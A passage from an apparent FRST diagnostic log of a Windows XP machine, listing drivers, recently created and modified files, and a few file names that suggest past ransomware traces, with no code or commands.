    S3 drmkaud; C:\WINDOWS\System32\drivers\drmkaud.sys [2944 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 E1000; C:\WINDOWS\System32\DRIVERS\e1000325.sys [164352 2006-04-27] (Intel Corporation) [File not signed]
    R1 ElbyCDIO; C:\WINDOWS\System32\Drivers\ElbyCDIO.sys [25768 2009-09-26] (Elaborate Bytes AG)
    R3 emupia; C:\WINDOWS\System32\drivers\emupia2k.sys [116000 2003-02-20] (Creative Technology Ltd) [File not signed]
    R4 Fastfat; C:\WINDOWS\system32\Drivers\Fastfat.sys [143744 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Fdc; C:\WINDOWS\System32\DRIVERS\fdc.sys [27392 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 FilterService; C:\WINDOWS\System32\DRIVERS\lvuvcflt.sys [23832 2009-10-07] (Logitech Inc.)
    R1 Fips; C:\WINDOWS\system32\Drivers\Fips.sys [44544 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Flpydisk; C:\WINDOWS\System32\DRIVERS\flpydisk.sys [20480 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 FltMgr; C:\WINDOWS\System32\drivers\fltmgr.sys [129792 2008-04-13] (Microsoft Corporation) [File not signed]
    U1 Fs_Rec; C:\WINDOWS\system32\Drivers\Fs_Rec.sys [7936 2004-08-04] (Microsoft Corporation) [File not signed]
    R0 Ftdisk; C:\WINDOWS\System32\DRIVERS\ftdisk.sys [125056 2004-08-04] (Microsoft Corporation) [File not signed]
    R3 Gpc; C:\WINDOWS\System32\DRIVERS\msgpc.sys [35072 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 GTNDIS5; C:\WINDOWS\system32\GTNDIS5.SYS [15872 2003-09-25] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
    R3 ha10kx2k; C:\WINDOWS\System32\drivers\ha10kx2k.sys [823616 2003-03-26] (Creative Technology Ltd) [File not signed]
    R3 hap16v2k; C:\WINDOWS\System32\drivers\hap16v2k.sys [141536 2003-03-26] (Creative Technology Ltd) [File not signed]
    R3 hidusb; C:\WINDOWS\System32\DRIVERS\hidusb.sys [10368 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
    R3 HSFHWBS2; C:\WINDOWS\System32\DRIVERS\HSFHWBS2.sys [212224 2003-11-17] (Conexant Systems, Inc.) [File not signed]
    R3 HSF_DP; C:\WINDOWS\System32\DRIVERS\HSF_DP.sys [1042432 2003-11-17] (Conexant Systems, Inc.) [File not signed]
    R3 HTTP; C:\WINDOWS\System32\Drivers\HTTP.sys [265728 2009-10-20] (Microsoft Corporation) [File not signed]
    R1 i8042prt; C:\WINDOWS\System32\DRIVERS\i8042prt.sys [52480 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Imapi; C:\WINDOWS\System32\DRIVERS\imapi.sys [42112 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 IntelIde; C:\WINDOWS\System32\DRIVERS\intelide.sys [5504 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 intelppm; C:\WINDOWS\System32\DRIVERS\intelppm.sys [36352 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 Ip6Fw; C:\WINDOWS\System32\drivers\ip6fw.sys [36608 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 IpFilterDriver; C:\WINDOWS\System32\DRIVERS\ipfltdrv.sys [32896 2004-08-04] (Microsoft Corporation) [File not signed]
    S3 IpInIp; C:\WINDOWS\System32\DRIVERS\ipinip.sys [20864 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 IpNat; C:\WINDOWS\System32\DRIVERS\ipnat.sys [152832 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 IPSec; C:\WINDOWS\System32\DRIVERS\ipsec.sys [75264 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 IRENUM; C:\WINDOWS\System32\DRIVERS\irenum.sys [11264 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 isapnp; C:\WINDOWS\System32\DRIVERS\isapnp.sys [37248 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Kbdclass; C:\WINDOWS\System32\DRIVERS\kbdclass.sys [24576 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 kbdhid; C:\WINDOWS\System32\DRIVERS\kbdhid.sys [14592 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 kmixer; C:\WINDOWS\System32\drivers\kmixer.sys [172416 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 KSecDD; C:\WINDOWS\system32\Drivers\KSecDD.sys [92928 2009-06-24] (Microsoft Corporation) [File not signed]
    S3 libusb0; C:\WINDOWS\System32\DRIVERS\libusb0.sys [42592 2012-07-31] (http://libusb-win32.sourceforge.net)
    R3 LVPr2Mon; C:\WINDOWS\System32\Drivers\LVPr2Mon.sys [25752 2009-10-07] ()
    R2 mdmxsdk; C:\WINDOWS\System32\DRIVERS\mdmxsdk.sys [11043 2003-04-09] (Conexant) [File not signed]
    R3 mfeapfk; C:\WINDOWS\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.)
    R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.)
    S3 mfebopk; C:\WINDOWS\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.)
    R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.)
    R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [575984 2015-02-11] (McAfee, Inc.)
    R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [350240 2014-08-20] (McAfee, Inc.)
    S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [81296 2014-08-20] (McAfee, Inc.)
    S3 mfendisk; C:\WINDOWS\System32\DRIVERS\mfendisk.sys [87520 2014-06-20] (McAfee, Inc.)
    R3 mfendiskmp; C:\WINDOWS\System32\DRIVERS\mfendisk.sys [87520 2014-06-20] (McAfee, Inc.)
    R1 mfetdi2k; C:\WINDOWS\System32\drivers\mfetdi2k.sys [93624 2014-06-20] (McAfee, Inc.)
    R1 mnmdd; C:\WINDOWS\system32\Drivers\mnmdd.sys [4224 2004-08-04] (Microsoft Corporation) [File not signed]
    R3 Modem; C:\WINDOWS\system32\Drivers\Modem.sys [30080 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MODEMCSA; C:\WINDOWS\System32\drivers\MODEMCSA.sys [16128 2001-08-17] (Microsoft Corporation) [File not signed]
    S3 motccgp; C:\WINDOWS\System32\DRIVERS\motccgp.sys [20480 2011-04-04] (Motorola) [File not signed]
    S3 motccgpfl; C:\WINDOWS\System32\DRIVERS\motccgpfl.sys [8320 2009-01-29] (Motorola) [File not signed]
    S3 motmodem; C:\WINDOWS\System32\DRIVERS\motmodem.sys [24064 2011-03-31] (Motorola) [File not signed]
    S3 MotoSwitchService; C:\WINDOWS\System32\DRIVERS\motswch.sys [6400 2007-11-02] (Motorola) [File not signed]
    S3 Motousbnet; C:\WINDOWS\System32\DRIVERS\Motousbnet.sys [23424 2010-04-01] (Motorola) [File not signed]
    S3 motusbdevice; C:\WINDOWS\System32\DRIVERS\motusbdevice.sys [9472 2010-01-25] (Motorola Inc) [File not signed]
    R1 Mouclass; C:\WINDOWS\System32\DRIVERS\mouclass.sys [23040 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 mouhid; C:\WINDOWS\System32\DRIVERS\mouhid.sys [12160 2004-08-04] (Microsoft Corporation) [File not signed]
    R0 MountMgr; C:\WINDOWS\system32\Drivers\MountMgr.sys [42368 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 MRxDAV; C:\WINDOWS\System32\DRIVERS\mrxdav.sys [180608 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 MRxSmb; C:\WINDOWS\System32\DRIVERS\mrxsmb.sys [456320 2011-07-15] (Microsoft Corporation) [File not signed]
    S3 MSDV; C:\WINDOWS\System32\DRIVERS\msdv.sys [51200 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Msfs; C:\WINDOWS\system32\Drivers\Msfs.sys [19072 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MSKSSRV; C:\WINDOWS\System32\drivers\MSKSSRV.sys [7552 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MSPCLOCK; C:\WINDOWS\System32\drivers\MSPCLOCK.sys [5376 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MSPQM; C:\WINDOWS\System32\drivers\MSPQM.sys [4992 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 mssmbios; C:\WINDOWS\System32\DRIVERS\mssmbios.sys [15488 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MSTEE; C:\WINDOWS\System32\drivers\MSTEE.sys [5504 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 Mup; C:\WINDOWS\system32\Drivers\Mup.sys [105472 2011-04-21] (Microsoft Corporation) [File not signed]
    R3 MxlW2k; C:\WINDOWS\system32\Drivers\MxlW2k.sys [28352 2010-01-12] (MusicMatch, Inc.) [File not signed]
    S3 NABTSFEC; C:\WINDOWS\System32\DRIVERS\NABTSFEC.sys [85248 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 NDIS; C:\WINDOWS\system32\Drivers\NDIS.sys [182656 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 NdisTapi; C:\WINDOWS\System32\DRIVERS\ndistapi.sys [10496 2011-07-08] (Microsoft Corporation) [File not signed]
    R3 Ndisuio; C:\WINDOWS\System32\DRIVERS\ndisuio.sys [14592 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 NdisWan; C:\WINDOWS\System32\DRIVERS\ndiswan.sys [91520 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 NDProxy; C:\WINDOWS\system32\Drivers\NDProxy.sys [40960 2013-11-27] (Microsoft Corporation) [File not signed]
    R1 NetBIOS; C:\WINDOWS\System32\DRIVERS\netbios.sys [34688 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 NetBT; C:\WINDOWS\System32\DRIVERS\netbt.sys [162816 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 NIC1394; C:\WINDOWS\System32\DRIVERS\nic1394.sys [61824 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Npfs; C:\WINDOWS\system32\Drivers\Npfs.sys [30848 2008-04-13] (Microsoft Corporation) [File not signed]
    R4 Ntfs; C:\WINDOWS\system32\Drivers\Ntfs.sys [574976 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Null; C:\WINDOWS\system32\Drivers\Null.sys [2944 2004-08-04] (Microsoft Corporation) [File not signed]
    R3 nv; C:\WINDOWS\System32\DRIVERS\nv4_mini.sys [1897408 2004-08-04] (NVIDIA Corporation) [File not signed]
    S3 NwlnkFlt; C:\WINDOWS\System32\DRIVERS\nwlnkflt.sys [12416 2004-08-04] (Microsoft Corporation) [File not signed]
    S3 NwlnkFwd; C:\WINDOWS\System32\DRIVERS\nwlnkfwd.sys [32512 2004-08-04] (Microsoft Corporation) [File not signed]
    R0 ohci1394; C:\WINDOWS\System32\DRIVERS\ohci1394.sys [61696 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 OMCI; C:\WINDOWS\SYSTEM32\DRIVERS\OMCI.SYS [13632 2001-08-22] (Dell Computer Corporation) [File not signed]
    R3 ossrv; C:\WINDOWS\System32\drivers\ctoss2k.sys [189504 2003-03-26] (Creative Technology Ltd.) [File not signed]
    R3 Parport; C:\WINDOWS\System32\DRIVERS\parport.sys [80128 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 PartMgr; C:\WINDOWS\system32\Drivers\PartMgr.sys [19712 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 ParVdm; C:\WINDOWS\system32\Drivers\ParVdm.sys [6784 2004-08-04] (Microsoft Corporation) [File not signed]
    R0 PCI; C:\WINDOWS\System32\DRIVERS\pci.sys [68224 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 PCIIde; C:\WINDOWS\System32\DRIVERS\pciide.sys [3328 2001-08-17] (Microsoft Corporation) [File not signed]
    S4 Pcmcia; C:\WINDOWS\system32\Drivers\Pcmcia.sys [120192 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 pcouffin; C:\WINDOWS\System32\Drivers\pcouffin.sys [47360 2010-09-17] (VSO Software) [File not signed]
    R2 PDFsFilter; C:\WINDOWS\System32\DRIVERS\PDFsFilter.sys [68464 2013-12-03] (Raxco Software, Inc.)
    R2 PfModNT; C:\WINDOWS\system32\drivers\PfModNT.sys [15840 2003-03-06] (Creative Technology Ltd.) [File not signed]
    R3 PptpMiniport; C:\WINDOWS\System32\DRIVERS\raspptp.sys [48384 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 PSched; C:\WINDOWS\System32\DRIVERS\psched.sys [69120 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Ptilink; C:\WINDOWS\System32\DRIVERS\ptilink.sys [17792 2004-08-04] (Parallel Technologies, Inc.) [File not signed]
    R1 RasAcd; C:\WINDOWS\System32\DRIVERS\rasacd.sys [8832 2004-08-04] (Microsoft Corporation) [File not signed]
    R3 Rasl2tp; C:\WINDOWS\System32\DRIVERS\rasl2tp.sys [51328 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 RasPppoe; C:\WINDOWS\System32\DRIVERS\raspppoe.sys [41472 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Raspti; C:\WINDOWS\System32\DRIVERS\raspti.sys [16512 2004-08-04] (Microsoft Corporation) [File not signed]
    R1 Rdbss; C:\WINDOWS\System32\DRIVERS\rdbss.sys [175744 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 RDPCDD; C:\WINDOWS\System32\DRIVERS\RDPCDD.sys [4224 2004-08-04] (Microsoft Corporation) [File not signed]
    R1 redbook; C:\WINDOWS\System32\DRIVERS\redbook.sys [57600 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 RemoteControl-USBLAN; C:\WINDOWS\System32\DRIVERS\rcblan.sys [39704 2007-01-24] (Belcarra Technologies)
    R3 RT73; C:\WINDOWS\System32\DRIVERS\rt73.sys [245248 2005-11-24] (Ralink Technology, Corp.) [File not signed]
    S3 Secdrv; C:\WINDOWS\System32\DRIVERS\secdrv.sys [20480 2008-04-13] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]
    R3 serenum; C:\WINDOWS\System32\DRIVERS\serenum.sys [15744 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Serial; C:\WINDOWS\System32\DRIVERS\serial.sys [64512 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 SLIP; C:\WINDOWS\System32\DRIVERS\SLIP.sys [11136 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 splitter; C:\WINDOWS\System32\drivers\splitter.sys [6272 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 sr; C:\WINDOWS\System32\DRIVERS\sr.sys [73472 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Srv; C:\WINDOWS\System32\DRIVERS\srv.sys [357888 2011-02-17] (Microsoft Corporation) [File not signed]
    S3 SSKBFD; C:\WINDOWS\System32\Drivers\sskbfd.sys [20848 2008-05-28] (Webroot Software Inc (www.webroot.com))
    R1 StarOpen; C:\WINDOWS\system32\Drivers\StarOpen.sys [5632 2011-07-25] () [File not signed]
    S3 streamip; C:\WINDOWS\System32\DRIVERS\StreamIP.sys [15232 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 swenum; C:\WINDOWS\System32\DRIVERS\swenum.sys [4352 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 swmidi; C:\WINDOWS\System32\drivers\swmidi.sys [56576 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 SymEvent; C:\Program Files\Symantec\SYMEVENT.SYS [82136 2003-08-15] (Symantec Corporation)
    R3 sysaudio; C:\WINDOWS\System32\drivers\sysaudio.sys [60800 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Tcpip; C:\WINDOWS\System32\DRIVERS\tcpip.sys [361600 2008-06-20] (Microsoft Corporation) [File not signed]
    S3 TDPIPE; C:\WINDOWS\system32\Drivers\TDPIPE.sys [12040 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 TDTCP; C:\WINDOWS\system32\Drivers\TDTCP.sys [21896 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 TermDD; C:\WINDOWS\System32\DRIVERS\termdd.sys [40840 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Update; C:\WINDOWS\System32\DRIVERS\update.sys [384768 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 USBAAPL; C:\WINDOWS\System32\Drivers\usbaapl.sys [44544 2012-09-28] (Apple, Inc.) [File not signed]
    S3 usbaudio; C:\WINDOWS\System32\drivers\usbaudio.sys [60160 2013-07-16] (Microsoft Corporation) [File not signed]
    R3 usbccgp; C:\WINDOWS\System32\DRIVERS\usbccgp.sys [32384 2013-08-08] (Microsoft Corporation) [File not signed]
    R3 usbehci; C:\WINDOWS\System32\DRIVERS\usbehci.sys [30336 2009-03-18] (Microsoft Corporation) [File not signed]
    R3 usbhub; C:\WINDOWS\System32\DRIVERS\usbhub.sys [59520 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 usbprint; C:\WINDOWS\System32\DRIVERS\usbprint.sys [25856 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 usbscan; C:\WINDOWS\System32\DRIVERS\usbscan.sys [14976 2013-07-02] (Microsoft Corporation) [File not signed]
    R3 USBSTOR; C:\WINDOWS\System32\DRIVERS\USBSTOR.SYS [26368 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 usbuhci; C:\WINDOWS\System32\DRIVERS\usbuhci.sys [20608 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 usbvideo; C:\WINDOWS\System32\Drivers\usbvideo.sys [123008 2013-07-16] (Microsoft Corporation) [File not signed]
    R1 VgaSave; C:\WINDOWS\System32\drivers\vga.sys [20992 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 VolSnap; C:\WINDOWS\system32\Drivers\VolSnap.sys [52352 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Wanarp; C:\WINDOWS\System32\DRIVERS\wanarp.sys [34560 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 wdmaud; C:\WINDOWS\System32\drivers\wdmaud.sys [83072 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 winachsf; C:\WINDOWS\System32\DRIVERS\HSF_CNXT.sys [680704 2003-11-17] (Conexant Systems, Inc.) [File not signed]
    S3 WpdUsb; C:\WINDOWS\System32\DRIVERS\wpdusb.sys [38528 2006-10-18] (Microsoft Corporation) [File not signed]
    R2 Wpsnuio; C:\WINDOWS\System32\DRIVERS\wpsnuio.sys [13696 2013-05-31] (Skyhook Wireless) [File not signed]
    S3 WSTCODEC; C:\WINDOWS\System32\DRIVERS\WSTCODEC.SYS [19200 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 WudfPf; C:\WINDOWS\System32\DRIVERS\WudfPf.sys [77568 2006-09-28] (Microsoft Corporation) [File not signed]
    S3 WudfRd; C:\WINDOWS\System32\DRIVERS\wudfrd.sys [82944 2006-09-28] (Microsoft Corporation) [File not signed]
    U0 mfewfpk; No ImagePath
    U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [96384 2008-04-13] (Microsoft Corporation) [File not signed]
    U1 WS2IFSL; No ImagePath

    ==================== NetSvcs (Whitelisted) ===================

    (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


    ==================== One Month Created Files and Folders ========

    (If an entry is included in the fixlist, the file\folder will be moved.)

    2015-03-28 19:49 - 2015-03-28 19:51 - 00000000 ____D () C:\FRST
    2015-03-28 19:40 - 2015-03-28 19:40 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\IDTool
    2015-03-28 17:53 - 2015-03-28 17:53 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Desktop\idtool
    2015-03-24 21:37 - 2015-03-24 21:37 - 00074703 _____ () C:\WINDOWS\system32\mfc45.dat
    2015-03-24 12:25 - 2015-03-24 12:27 - 00000000 ____D () C:\Program Files\Mozilla Firefox
    2015-03-22 23:32 - 2015-03-23 23:53 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Desktop\AMY S3
    2015-03-12 09:57 - 2015-03-12 09:57 - 00000000 _____ () C:\avenger.txt
    2015-03-12 09:55 - 2015-03-12 09:55 - 00052440 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\imtmeaq.sys

    ==================== One Month Modified Files and Folders =======

    (If an entry is included in the fixlist, the file\folder will be moved.)

    2015-03-28 19:55 - 2009-03-26 12:27 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Local Settings\Temp
    2015-03-28 19:38 - 2009-06-30 04:45 - 00000990 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-515967899-117609710-839522115-1004UA.job
    2015-03-28 19:35 - 2012-08-28 00:18 - 00000886 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2015-03-28 19:30 - 2009-03-26 07:12 - 00647862 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
    2015-03-28 19:27 - 2013-05-10 23:06 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\McAfee
    2015-03-28 19:22 - 2014-02-24 18:57 - 00524288 _____ () C:\WINDOWS\system32\config\ACEEvent.evt
    2015-03-28 19:20 - 2009-03-26 07:14 - 00000159 _____ () C:\WINDOWS\wiadebug.log
    2015-03-28 19:19 - 2010-12-16 01:45 - 00783804 _____ () C:\Documents and Settings\All Users\dleascan.log
    2015-03-28 19:19 - 2009-03-28 00:33 - 00000000 ____D () C:\MDT
    2015-03-28 19:19 - 2009-03-26 07:14 - 00000049 _____ () C:\WINDOWS\wiaservc.log
    2015-03-28 19:18 - 2015-01-16 18:19 - 00000254 ____H () C:\WINDOWS\Tasks\dluddia.job
    2015-03-28 19:18 - 2014-03-23 18:55 - 00000228 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job
    2015-03-28 19:18 - 2012-08-28 00:18 - 00000882 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2015-03-28 19:18 - 2010-08-08 00:34 - 00000616 ____H () C:\WINDOWS\Tasks\ConfigExec.job
    2015-03-28 19:18 - 2009-03-26 12:23 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
    2015-03-28 19:17 - 2009-03-26 16:49 - 00001080 _____ () C:\WINDOWS\system32\settingsbkup.sfm
    2015-03-28 19:17 - 2009-03-26 16:49 - 00001080 _____ () C:\WINDOWS\system32\settings.sfm
    2015-03-28 19:17 - 2009-03-26 16:49 - 00000288 _____ () C:\WINDOWS\system32\DVCStateBkp-{00000002-00000000-00000002-00001102-00000004-10031102}.dat
    2015-03-28 19:17 - 2009-03-26 16:49 - 00000288 _____ () C:\WINDOWS\system32\DVCState-{00000002-00000000-00000002-00001102-00000004-10031102}.dat
    2015-03-28 19:16 - 2014-04-13 01:41 - 01048576 _____ () C:\WINDOWS\system32\config\iolo App.evt
    2015-03-28 19:16 - 2014-01-19 02:28 - 00178066 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\WPFFontCache_v0400-System.dat
    2015-03-28 19:16 - 2013-10-14 00:56 - 00593344 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\FontCache3.0.0.0.dat
    2015-03-28 19:16 - 2010-08-07 23:59 - 15728640 _____ () C:\WINDOWS\system32\config\WindowsPowerShell.evt
    2015-03-28 19:16 - 2009-03-26 12:27 - 00000178 ___SH () C:\Documents and Settings\RAUL_104\ntuser.ini
    2015-03-28 19:16 - 2009-03-26 12:23 - 00032564 _____ () C:\WINDOWS\SchedLgU.Txt
    2015-03-28 19:16 - 2009-03-26 12:20 - 02041696 _____ () C:\WINDOWS\WindowsUpdate.log
    2015-03-28 19:13 - 2009-03-26 14:46 - 04481358 _____ () C:\WINDOWS\{00000002-00000000-00000002-00001102-00000004-10031102}.CDF
    2015-03-28 19:09 - 2014-09-26 19:45 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2015-03-28 18:57 - 2009-03-26 07:10 - 00000211 ___SH () C:\boot.ini
    2015-03-28 18:57 - 2004-08-04 06:00 - 00000687 _____ () C:\WINDOWS\win.ini
    2015-03-28 18:57 - 2004-08-04 06:00 - 00000227 _____ () C:\WINDOWS\system.ini
    2015-03-28 16:52 - 2015-02-01 00:28 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\MFAData
    2015-03-27 20:34 - 2010-08-08 00:34 - 00000580 ____H () C:\WINDOWS\Tasks\DataUpload.job
    2015-03-27 13:01 - 2014-04-05 13:35 - 00000458 _____ () C:\WINDOWS\Tasks\SystemToolsDailyTest.job
    2015-03-27 12:38 - 2009-06-30 04:45 - 00000938 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-515967899-117609710-839522115-1004Core.job
    2015-03-27 02:04 - 2015-01-27 20:14 - 00000412 ____H () C:\WINDOWS\Tasks\CryptoUpdate.job
    2015-03-26 13:13 - 2012-04-29 19:25 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
    2015-03-24 23:25 - 2012-04-07 03:32 - 00778928 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
    2015-03-24 23:25 - 2011-05-15 18:00 - 00142512 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
    2015-03-24 23:25 - 2009-03-27 11:50 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Adobe
    2015-03-24 21:59 - 2012-08-04 22:57 - 00015414 _____ () C:\WINDOWS\wmsetup.log
    2015-03-24 21:57 - 2010-03-16 23:31 - 00000069 _____ () C:\WINDOWS\NeroDigital.ini
    2015-03-24 21:57 - 2010-02-18 15:12 - 00000128 _____ () C:\Documents and Settings\RAUL_104\Application Data\default.rss
    2015-03-24 04:44 - 2011-08-19 23:54 - 00000000 ____D () C:\Documents and Settings\RAUL_104\Application Data\FileZilla
    2015-03-21 13:39 - 2009-03-27 00:28 - 00002309 _____ () C:\Documents and Settings\RAUL_104\Desktop\Google Chrome.lnk
    2015-03-21 04:00 - 2010-09-10 16:07 - 00000330 ____H () C:\WINDOWS\Tasks\MP Scheduled Scan.job
    2015-03-21 04:00 - 2009-03-26 12:23 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Temp
    2015-03-19 10:13 - 2009-03-26 12:27 - 00000000 ____D () C:\Documents and Settings\RAUL_104
    2015-03-19 09:38 - 2004-08-04 06:00 - 00002206 _____ () C:\WINDOWS\system32\wpa.dbl
    2015-03-13 11:52 - 2015-01-25 21:09 - 00114904 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2015-03-12 09:55 - 2009-12-08 21:20 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB970430$
    2015-03-09 12:47 - 2015-02-01 00:49 - 00000702 _____ () C:\Documents and Settings\All Users\Desktop\AVG 2015.lnk
    2015-03-09 12:47 - 2015-02-01 00:49 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\AVG
    2015-03-09 12:40 - 2015-02-01 00:42 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\AVG2015
    2015-03-09 10:09 - 2014-03-23 18:55 - 00000222 _____ () C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job
    2015-03-08 17:51 - 2010-09-15 20:25 - 00000000 ____D () C:\Documents and Settings\AMY_1061\Local Settings\Temp
    2015-03-01 11:01 - 2014-04-05 13:35 - 00000520 _____ () C:\WINDOWS\Tasks\PCDoctorBackgroundMonitorTask.job
    2015-02-26 17:05 - 2010-02-01 18:16 - 00002187 _____ () C:\Documents and Settings\All Users\Desktop\Safari.lnk
    2015-02-26 17:04 - 2010-09-19 00:39 - 00002397 _____ () C:\Documents and Settings\All Users\Start Menu\Programs\Safari.lnk

    ==================== Files in the root of some directories =======

    2010-02-18 15:12 - 2015-03-24 21:57 - 0000128 _____ () C:\Documents and Settings\RAUL_104\Application Data\default.rss
    2015-01-27 22:42 - 2015-01-27 22:42 - 0045601 _____ () C:\Documents and Settings\RAUL_104\Application Data\HELP_DECRYPT.PNG
    2015-01-27 22:42 - 2015-01-27 22:42 - 0000276 _____ () C:\Documents and Settings\RAUL_104\Application Data\HELP_DECRYPT.URL
    2010-09-17 23:40 - 2010-09-17 23:40 - 0087608 _____ () C:\Documents and Settings\RAUL_104\Application Data\inst.exe
    2010-09-17 23:40 - 2010-09-17 23:40 - 0007887 _____ () C:\Documents and Settings\RAUL_104\Application Data\pcouffin.cat
    2010-09-17 23:40 - 2010-09-17 23:40 - 0001144 _____ () C:\Documents and Settings\RAUL_104\Application Data\pcouffin.inf
    2010-09-17 23:41 - 2010-09-17 23:41 - 0000034 _____ () C:\Documents and Settings\RAUL_104\Application Data\pcouffin.log
    2010-09-17 23:40 - 2010-09-17 23:40 - 0047360 _____ (VSO Software) C:\Documents and Settings\RAUL_104\Application Data\pcouffin.sys
    2011-09-03 20:36 - 2011-09-03 20:36 - 0000338 _____ () C:\Documents and Settings\RAUL_104\Application Data\settings.dat
